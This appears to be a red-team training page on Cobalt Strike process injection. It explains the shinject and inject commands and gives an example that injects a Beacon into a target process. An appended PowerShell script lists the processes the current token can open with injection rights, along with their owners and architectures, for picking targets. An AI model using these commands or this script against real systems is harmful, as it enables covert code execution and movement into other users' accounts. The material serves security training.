Last updated
Process injection allows us to run arbitrary shellcode inside a process of our choosing. You can only inject into a process that you can open a handle to with enough access rights to write into its memory (and to create or hijack a thread in it). In a non-elevated context this usually limits you to processes running as your own user; in an elevated context it extends to processes owned by other users, so injection is also a way to move into a different user's security context.
Beacon has two main injection commands: shinject and inject. shinject injects arbitrary shellcode read from a binary file on your attacking machine, and inject injects a full Beacon payload for the specified listener.
If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

inject 4464 x64 tcp-local

Where:
4464 is the target PID.
x64 is the architecture of the target process (this must match the process, not the host; an x86 payload in an x64 process, or vice versa, will fail).
tcp-local is the listener name.
If a P2P listener is used, the command will also automatically attempt to connect to the new child Beacon. The resulting Beacon runs with the full privilege of the user who owns the target process.
The same caveats from the previous module also apply: if the user closes the process, the Beacon is lost. The injected shellcode uses the ExitThread exit function rather than ExitProcess, so exiting the Beacon only ends its thread and does not kill the host process.
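The opening paragraph's point, that injection is limited to processes you can open with write and thread-creation rights, is easy to check before issuing inject. The script below is an added example and is not part of the course material or of Cobalt Strike: run in a PowerShell session with the same token Beacon is running as, it tries OpenProcess on every process with the access mask a remote-thread injector needs, and for each one that succeeds reports the PID, owner and architecture that inject expects as its arguments. The function name Test-InjectTarget, the namespace InjectCheck and the exact access mask are this example's own choices; the rights chosen are the ones a classic OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence requires.

```powershell
# Added example (not from the original page or from Cobalt Strike): test which
# processes the current token can open with the rights an injector needs.
# Only a handle is opened; nothing is written to any process.
$signature = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool IsWow64Process(IntPtr hProcess, out bool Wow64Process);
'@
$k32 = Add-Type -MemberDefinition $signature -Name 'Kernel32' -Namespace 'InjectCheck' -PassThru

# Access rights a CreateRemoteThread-style injector needs on the target process.
$PROCESS_CREATE_THREAD             = 0x0002
$PROCESS_VM_OPERATION              = 0x0008   # VirtualAllocEx / VirtualProtectEx
$PROCESS_VM_READ                   = 0x0010
$PROCESS_VM_WRITE                  = 0x0020   # WriteProcessMemory
$PROCESS_QUERY_LIMITED_INFORMATION = 0x1000   # IsWow64Process
$InjectRights = $PROCESS_CREATE_THREAD -bor $PROCESS_VM_OPERATION -bor `
                $PROCESS_VM_READ -bor $PROCESS_VM_WRITE -bor $PROCESS_QUERY_LIMITED_INFORMATION

function Test-InjectTarget {
    # Hypothetical helper (this example's own name): returns whether the current
    # token can open the given PID with $InjectRights, plus the architecture value
    # the inject command expects (x86 for Wow64 processes, x64 otherwise).
    param([Parameter(Mandatory)][int]$ProcessId)

    $h = $k32::OpenProcess([uint32]$InjectRights, $false, [uint32]$ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        # Error 5 (ERROR_ACCESS_DENIED) is the normal answer for other users'
        # processes in a non-elevated context, and for protected (PPL) processes
        # even when elevated with SeDebugPrivilege.
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        return [pscustomobject]@{ PID = $ProcessId; Injectable = $false; Arch = $null; Error = $err }
    }

    $wow64 = $false
    $arch = 'x64'
    if ([Environment]::Is64BitOperatingSystem -and $k32::IsWow64Process($h, [ref]$wow64) -and $wow64) {
        $arch = 'x86'
    } elseif (-not [Environment]::Is64BitOperatingSystem) {
        $arch = 'x86'
    }
    [void]$k32::CloseHandle($h)
    return [pscustomobject]@{ PID = $ProcessId; Injectable = $true; Arch = $arch; Error = 0 }
}

function Get-InjectableProcesses {
    # Hypothetical helper: every process the current token can open, with its
    # owner so you know which user's privilege the injected Beacon would inherit.
    foreach ($p in Get-Process) {
        $r = Test-InjectTarget -ProcessId $p.Id
        if (-not $r.Injectable) { continue }
        $owner = '?'
        try {
            $ci = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.Id)" -ErrorAction Stop
            $o  = Invoke-CimMethod -InputObject $ci -MethodName GetOwner -ErrorAction Stop
            if ($o.User) { $owner = "$($o.Domain)\$($o.User)" }
        } catch { }
        [pscustomobject]@{ PID = $p.Id; Name = $p.ProcessName; Owner = $owner; Arch = $r.Arch }
    }
}

# Usage: list candidates, then pick PID and Arch for "inject <pid> <arch> <listener>".
Get-InjectableProcesses | Sort-Object Owner, Name | Format-Table -AutoSize
```

Run it once from a non-elevated context and once elevated to see the difference the opening paragraph describes: the first list is essentially your own processes, the second adds other users' processes (SYSTEM included, subject to SeDebugPrivilege and PPL). The Arch column is the value to pass as the second argument to inject.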